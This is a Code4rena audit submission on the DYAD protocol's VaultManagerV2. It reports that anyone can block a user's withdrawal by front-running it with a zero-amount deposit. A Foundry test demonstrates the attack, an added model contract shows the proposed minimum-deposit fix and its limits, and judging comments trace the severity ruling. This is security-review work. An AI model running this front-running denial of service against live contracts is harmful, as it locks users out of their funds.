Platform: Code4rena
Start Date: 18/04/2024
Pot Size: $36,500 USDC
Total HM: 19
Participants: 183
Period: 7 days
Judge: Koolex
Id: 367
League: ETH
Rank: 170/183
Findings: 1
Award: $0.02
🌟 Selected for report: 0
🚀 Solo Findings: 0
🌟 Selected for report: MrPotatoMagic
Also found by: 0x175, 0x486776, 0x77, 0xAkira, 0xAsen, 0xDemon, 0xabhay, 0xblack_bird, 0xlemon, 0xloscar01, 0xtankr, 3docSec, 4rdiii, Abdessamed, AlexCzm, Angry_Mustache_Man, BiasedMerc, Circolors, Cryptor, DMoore, DPS, DedOhWale, Dinesh11G, Dots, GalloDaSballo, Giorgio, Honour, Imp, Jorgect, Krace, KupiaSec, Mrxstrange, NentoR, Pechenite, PoeAudits, Ryonen, SBSecurity, Sabit, T1MOH, TheFabled, TheSavageTeddy, Tychai0s, VAD37, Vasquez, WildSniper, ZanyBonzy, adam-idarrha, alix40, asui, blutorque, btk, c0pp3rscr3w3r, caglankaan, carrotsmuggler, d_tony7470, dimulski, dinkras, djxploit, falconhoof, forgebyola, grearlake, imare, itsabinashb, josephdara, kartik_giri_47538, ke1caM, kennedy1030, koo, lionking927, ljj, niser93, pep7siup, poslednaya, ptsanev, sashik_eth, shaflow2, steadyman, turvy_fuzz, ubl4nk, valentin_s2304, web3km, xyz, y4y, zhaojohnson, zigtur
0.0234 USDC - $0.02
https://github.com/code-423n4/2024-04-dyad/blob/cd48c684a58158de444b24854ffd8f07d046c31b/src/core/VaultManagerV2.sol#L119-L131
https://github.com/code-423n4/2024-04-dyad/blob/cd48c684a58158de444b24854ffd8f07d046c31b/src/core/VaultManagerV2.sol#L134-L153
VaultManagerV2.withdraw will revert on same-block deposit and withdraw operations, using the idToBlockOfLastDeposit[id] == block.number check.
However, an attacker can front-run any user's withdraw call with a zero-amount deposit to the same dNFT and vault, setting idToBlockOfLastDeposit[id] to the same block as the user's withdraw call, which causes the user's withdraw call to always fail.
To sum up, an attacker can disable the core function VaultManagerV2.withdraw for only the gas fee.
An attacker can front-run a withdraw call with a zero-amount deposit call to make it revert; see the test code below.
function test_zero() public {
    address attacker = address(0xABC);
    address alice = address(0x123);
    uint id = dNft.mintNft{value: 1 ether}(alice);

    vm.startPrank(alice);
    vaultManager.add(id, address(wethVault));
    uint alice_amt = 1e18;
    weth.mint(alice, alice_amt);
    vm.roll(1000);
    weth.approve(address(vaultManager), alice_amt);
    vaultManager.deposit(id, address(wethVault), alice_amt);
    assertEq(1000, vaultManager.idToBlockOfLastDeposit(id));
    vm.stopPrank();

    vm.roll(2000);
    // @audit: attacker listens to the mempool and sees that alice is trying to withdraw
    vm.startPrank(attacker);
    uint zero_amt = 0;
    // @audit: attacker triggers a zero-amount deposit
    vaultManager.deposit(id, address(wethVault), zero_amt);
    assertEq(2000, vaultManager.idToBlockOfLastDeposit(id));
    vm.stopPrank();

    vm.startPrank(alice);
    // @audit: alice fails to withdraw
    vm.expectRevert(IVaultManager.DepositedInSameBlock.selector);
    vaultManager.withdraw(id, address(wethVault), alice_amt, alice);
    vm.stopPrank();
}
Manual Review and Foundry
Add a minimal deposit amount check.
DoS
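A simplified model of the same-block guard with the minimal deposit check recommended above, as an added example that is not part of the original submission or the DYAD code base. GuardModel, minDeposit and DepositTooSmall are hypothetical names, balances are plain numbers with no token transfers or ownership checks, and the tests assume a Foundry project with forge-std.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

import {Test} from "forge-std/Test.sol";
// Simplified model (added example): no tokens, no dNFT ownership checks.
contract GuardModel {
    error DepositedInSameBlock();
    error DepositTooSmall(); // hypothetical error for the added check
    uint256 public immutable minDeposit; // 0 reproduces the reported behaviour
    mapping(uint256 => uint256) public idToBlockOfLastDeposit;
    mapping(uint256 => uint256) public balanceOf;

    constructor(uint256 minDeposit_) { minDeposit = minDeposit_; }
    // Anyone may deposit into any id, as in the report's test.
    function deposit(uint256 id, uint256 amount) external {
        if (amount < minDeposit) revert DepositTooSmall();
        idToBlockOfLastDeposit[id] = block.number;
        balanceOf[id] += amount;
    }

    function withdraw(uint256 id, uint256 amount) external {
        if (idToBlockOfLastDeposit[id] == block.number) revert DepositedInSameBlock();
        balanceOf[id] -= amount;
    }
}

contract GuardModelTest is Test {
    uint256 constant ID = 1;
    // Fund the id at block 1000, then move to block 2000 for the withdraw.
    function _fund(uint256 minDeposit) internal returns (GuardModel m) {
        m = new GuardModel(minDeposit);
        vm.roll(1000);
        m.deposit(ID, 1e18);
        vm.roll(2000);
    }

    function test_zeroDepositBlocksWithdraw() public {
        GuardModel m = _fund(0);
        m.deposit(ID, 0); // third-party call that costs only gas
        vm.expectRevert(GuardModel.DepositedInSameBlock.selector);
        m.withdraw(ID, 1e18);
    }

    function test_minimumRejectsZeroDeposit() public {
        GuardModel m = _fund(1e16);
        vm.expectRevert(GuardModel.DepositTooSmall.selector);
        m.deposit(ID, 0);
        m.withdraw(ID, 1e18); // guard was not re-armed, so this succeeds
    }
}
```

In this model a nonzero minimum only prices the blocking call: a third-party deposit of at least minDeposit still sets idToBlockOfLastDeposit[id] for that block, with the amount credited to the target id.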
#0 - c4-pre-sort
2024-04-27T11:38:42Z
JustDravee marked the issue as duplicate of #1103
#1 - c4-pre-sort
2024-04-27T11:45:37Z
JustDravee marked the issue as duplicate of #489
#2 - c4-pre-sort
2024-04-29T09:25:36Z
JustDravee marked the issue as sufficient quality report
#3 - c4-judge
2024-05-05T20:38:17Z
koolexcrypto marked the issue as unsatisfactory: Invalid
#4 - c4-judge
2024-05-05T20:39:23Z
koolexcrypto marked the issue as unsatisfactory: Invalid
#5 - c4-judge
2024-05-05T20:39:26Z
koolexcrypto marked the issue as unsatisfactory: Invalid
#6 - c4-judge
2024-05-05T21:37:29Z
koolexcrypto marked the issue as nullified
#7 - c4-judge
2024-05-05T21:37:32Z
koolexcrypto marked the issue as not nullified
#8 - c4-judge
2024-05-08T15:28:02Z
koolexcrypto marked the issue as duplicate of #1001
#9 - c4-judge
2024-05-11T19:50:02Z
koolexcrypto marked the issue as satisfactory
#10 - c4-judge
2024-05-13T18:34:30Z
koolexcrypto changed the severity to 3 (High Risk)